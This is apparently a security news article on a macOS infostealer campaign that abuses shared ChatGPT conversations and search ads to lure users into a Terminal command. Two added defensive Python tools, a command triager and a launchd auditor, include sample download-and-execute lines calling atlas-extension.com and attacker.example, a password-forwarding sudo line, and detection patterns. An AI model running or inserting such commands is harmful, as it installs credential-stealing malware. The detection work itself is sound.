Kaspersky uncovers macOS infostealer campaign abusing ChatGPT’s chat-sharing feature

Kaspersky Threat Research has identified a new malware campaign that uses paid Google search ads and shared conversations on the official ChatGPT website to trick Mac users into running a command that installs the AMOS (Atomic macOS Stealer) infostealer and a persistent backdoor on their devices.

In the campaign, attackers buy sponsored search ads for queries such as “chatgpt atlas” and direct users to a page that appears to be an installation guide for “ChatGPT Atlas for macOS” hosted at chatgpt.com.

Abuse of ChatGPT’s Sharing Feature

In reality, the page is a shared ChatGPT conversation generated through prompt engineering and then trimmed so that only the step-by-step “installation” instructions remain.

The guide instructs users to copy a single line of code, open Terminal on macOS, paste the command, and grant all requested permissions.

Kaspersky researchers’ analysis shows that the command downloads and executes a script from the external domain atlas-extension[.]com.

Infection Flow and ClickFix Technique

The script repeatedly prompts the user for their system password and validates the password by attempting to run system commands.

Once the correct password is supplied, the script downloads the AMOS infostealer, uses the stolen credentials to install it, and launches the malware.

The infection flow represents a variation of the so-called ClickFix technique, in which users are persuaded to manually execute shell commands that retrieve and run code from remote servers.
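To make the “understand what a pasted command does before running it” advice concrete, here is an added example (not Kaspersky’s tooling, and not the campaign’s actual command) of a small Python triage script for a Terminal one-liner: it peels base64 wrapping, flags download-and-execute pipes and password prompts, and matches any URL host against the one domain the report names. The only indicator taken from the report is atlas-extension[.]com; the sample commands, the /x.sh path and the attacker.example host are constructed for the example.

```python
"""Static triage of a pasted Terminal one-liner before anyone runs it.

Added example, not Kaspersky's tooling. The only indicator taken from the
report is the domain atlas-extension[.]com; every command, URL path and the
attacker.example host below are constructed for illustration.
"""
import base64
import binascii
import re
from dataclasses import dataclass, field

# Campaign host from the report, undefanged so URLs can be matched against it.
KNOWN_BAD_HOSTS = {"atlas-extension.com"}

# "fetch something and pipe it straight into a shell", with or without sudo.
DOWNLOAD_EXEC = re.compile(
    r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+(-\S+\s+)*)?(ba|z)?sh\b"
    r"|\b(ba|z)?sh\s+-c\s+[\"']?\$\((curl|wget)\b"
)
# Ways a script asks for, or forwards, the account password.
PASSWORD_PROMPT = re.compile(
    r"\bread\s+-s\b|\bsudo\s+-S\b|with hidden answer|\bdscl\b.*-authonly",
    re.IGNORECASE,
)
BASE64_DECODE = re.compile(r"\bbase64\s+(-d|-D|--decode)\b")
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)


@dataclass
class Verdict:
    decoded_layers: int = 0
    hosts: set = field(default_factory=set)
    findings: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.findings)


def peel_base64(cmd: str, max_layers: int = 3) -> tuple:
    """Follow `echo <blob> | base64 -d | sh` style wrapping down to the
    real command, at most max_layers deep. Returns (inner_text, layers)."""
    text, layers = cmd, 0
    while layers < max_layers and BASE64_DECODE.search(text):
        blobs = BASE64_BLOB.findall(text)
        if not blobs:
            break
        try:
            decoded = base64.b64decode(max(blobs, key=len), validate=True)
        except (binascii.Error, ValueError):
            break
        text = decoded.decode("utf-8", errors="replace")
        layers += 1
    return text, layers


def triage(cmd: str) -> Verdict:
    """Explain what a pasted command would do, without executing any of it."""
    v = Verdict()
    text, v.decoded_layers = peel_base64(cmd)
    if v.decoded_layers:
        v.findings.append(f"payload hidden behind {v.decoded_layers} base64 layer(s)")
    v.hosts = {h.lower() for h in URL_HOST.findall(text)}
    if DOWNLOAD_EXEC.search(text):
        v.findings.append("downloads a remote script and pipes it straight into a shell")
    if PASSWORD_PROMPT.search(text):
        v.findings.append("asks for or forwards the account password")
    bad = v.hosts & KNOWN_BAD_HOSTS
    if bad:
        v.findings.append("contacts a host named in the report: " + ", ".join(sorted(bad)))
    return v


# Constructed samples. INNER mimics the shape of a ClickFix stage-1 command;
# the /x.sh path is hypothetical, not something observed in the campaign.
INNER = "curl -fsSL https://atlas-extension.com/x.sh | bash"
SAMPLE_CLICKFIX = 'echo "%s" | base64 -d | bash' % base64.b64encode(INNER.encode()).decode()
SAMPLE_PASSWORD = 'read -s -p "Password: " pw; echo "$pw" | sudo -S -v'
SAMPLE_BENIGN = "brew install --cask firefox"

if __name__ == "__main__":
    for name, cmd in [("clickfix", SAMPLE_CLICKFIX), ("password", SAMPLE_PASSWORD), ("benign", SAMPLE_BENIGN)]:
        v = triage(cmd)
        print(f"[{name}] suspicious={v.suspicious} hosts={sorted(v.hosts)}")
        for finding in v.findings:
            print("   -", finding)
```

The script never executes anything it is given; it only decodes and pattern-matches, which is the property a “what does this do” check must have. A real deployment would extend KNOWN_BAD_HOSTS from a threat-intelligence feed rather than a single literal.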

Data Theft and Backdoor Installation

After installation, AMOS collects data that can be monetized or reused in later intrusions. The malware targets passwords, cookies, and other information from popular browsers; data from cryptocurrency wallets such as Electrum, Coinomi, and Exodus; and information from applications including Telegram Desktop and OpenVPN Connect.

It also searches for files with TXT, PDF, and DOCX extensions in the Desktop, Documents, and Downloads folders, as well as files stored by the Notes application, then exfiltrates this data to attacker controlled infrastructure.

Persistent Access and Broader Threat Trends

In parallel, the attack installs a backdoor that is configured to start automatically on reboot, gives remote access to the compromised system, and duplicates much of AMOS’s data collection logic.
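The report does not say how the backdoor is registered to start on reboot; on macOS that is most often a launchd job, so the added example below (not from the report) audits LaunchAgents and LaunchDaemons for the traits a dropped job tends to show: an interpreter or downloader in ProgramArguments, RunAtLoad combined with KeepAlive or StartInterval, an executable in a temp or hidden directory, and an Apple-style label outside /System. The sample plist and its attacker.example URL are constructed.

```python
"""Audit launchd jobs for the traits of a dropped 'start on reboot' backdoor.

Added example, not from the report. The report does not say which persistence
mechanism the backdoor uses; LaunchAgents/LaunchDaemons are assumed here
because they are the usual choice on macOS. The sample plist is constructed
and its attacker.example URL is a placeholder.
"""
import plistlib
import re
from pathlib import Path
from xml.parsers.expat import ExpatError

LAUNCHD_DIRS = [
    "/Library/LaunchAgents",
    "/Library/LaunchDaemons",
    str(Path.home() / "Library" / "LaunchAgents"),
]

# Interpreters and downloaders that a vendor agent rarely launches directly.
SUSPICIOUS_ARG = re.compile(
    r"\b(curl|wget|osascript|nohup)\b|\b(ba|z)?sh\s+-c\b|\bbase64\b|\bpython3?\s+-c\b"
)
# Executables living in temp or hidden user-writable locations.
SUSPICIOUS_PATH = re.compile(
    r"^(/tmp/|/private/tmp/|/var/tmp/|/private/var/folders/|/var/folders/|/Users/Shared/|/Users/[^/]+/\.)"
)


def audit_job(job: dict, source: str) -> list:
    """Return the reasons one launchd job dictionary looks like dropped
    persistence; an empty list means nothing was flagged."""
    reasons = []
    args = [str(a) for a in (job.get("ProgramArguments") or [])]
    if job.get("Program"):
        args.insert(0, str(job["Program"]))
    cmdline = " ".join(args)

    if job.get("RunAtLoad") and (job.get("KeepAlive") or job.get("StartInterval")):
        reasons.append("RunAtLoad combined with KeepAlive/StartInterval (restarts itself)")
    if SUSPICIOUS_ARG.search(cmdline):
        reasons.append(f"interpreter or downloader in ProgramArguments: {cmdline}")
    if args and SUSPICIOUS_PATH.match(args[0]):
        reasons.append(f"executable in a temp or hidden directory: {args[0]}")
    label = str(job.get("Label", ""))
    if label.startswith("com.apple.") and not source.startswith("/System/"):
        reasons.append(f"Apple-style label outside /System: {label}")
    return reasons


def audit_plist_bytes(data: bytes, source: str) -> list:
    """Parse a plist (XML or binary) and audit it; unparseable input is skipped."""
    try:
        job = plistlib.loads(data)
    except (plistlib.InvalidFileException, ValueError, ExpatError):
        return []
    return audit_job(job, source) if isinstance(job, dict) else []


def audit_dirs(dirs=LAUNCHD_DIRS) -> dict:
    """Walk the launchd directories and map each flagged plist to its reasons."""
    hits = {}
    for d in dirs:
        if not Path(d).is_dir():
            continue
        for p in Path(d).glob("*.plist"):
            try:
                reasons = audit_plist_bytes(p.read_bytes(), str(p))
            except OSError:
                continue
            if reasons:
                hits[str(p)] = reasons
    return hits


# Constructed sample of what a dropped user LaunchAgent might look like.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.apple.updater.helper</string>
  <key>ProgramArguments</key>
  <array>
    <string>/bin/bash</string>
    <string>-c</string>
    <string>curl -fsSL https://attacker.example/b | bash</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict>
</plist>
"""
SAMPLE_SOURCE = "/Users/alice/Library/LaunchAgents/com.apple.updater.helper.plist"

if __name__ == "__main__":
    print("sample plist:", audit_plist_bytes(SAMPLE_PLIST, SAMPLE_SOURCE))
    for path, reasons in audit_dirs().items():
        print(path)
        for reason in reasons:
            print("  -", reason)
```

Run it as the affected user for the per-user LaunchAgents directory and with sudo for the system directories; a hit is a lead to investigate, not proof of compromise, since some legitimate agents also use KeepAlive or shell wrappers.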

The campaign reflects a broader trend in which infostealers have become one of 2025’s fastest-growing threats, with attackers actively experimenting with AI-related themes, fake AI tools, and AI-generated content to increase the credibility of their lures.

Recent waves have included fake AI browser sidebars and fraudulent clients for popular models; the Atlas themed activity extends this pattern by abusing a legitimate AI platform’s built in content sharing feature.

Expert Commentary and User Trust

“What makes this case effective is not a sophisticated exploit, but the way social engineering is wrapped in a familiar AI context,” said Vladimir Gursky, Malware Analyst at Kaspersky.

“A sponsored link leads to a well-formatted page on a trusted domain, and the ‘installation guide’ is just a single Terminal command.

For many users, that combination of trust and simplicity is enough to bypass their usual caution, yet the result is full compromise of the system and long-term access for the attacker.”

Security Recommendations for Users

Kaspersky recommends that users:

• Treat any unsolicited “guide” that asks them to run Terminal or PowerShell commands with caution, especially when it involves copying and pasting a one-line script from a website, document, or chat.

• Close pages or delete messages that ask for such actions if the instructions are unclear, and seek advice from a knowledgeable source before proceeding.

• Consider pasting any suspicious commands into a separate AI or security tool to understand what the code does before executing it.

• Install and maintain reputable security software on all devices, including macOS and Linux systems, such as Kaspersky Premium, to detect and block infostealers and related payloads.

About Kaspersky

Kaspersky is a global cybersecurity and digital privacy company founded in 1997, with over a billion devices protected to date from emerging cyberthreats and targeted attacks.

Kaspersky’s deep threat intelligence and security expertise is constantly transforming into innovative solutions and services to protect businesses, critical infrastructure, governments and consumers around the globe.

Company Profile and Global Reach

The company’s comprehensive security portfolio includes leading endpoint protection, specialized security products and services, as well as Cyber Immune solutions to fight sophisticated and evolving digital threats.

We help nearly 200,000 corporate clients protect what matters most to them. Learn more at www.kaspersky.com.
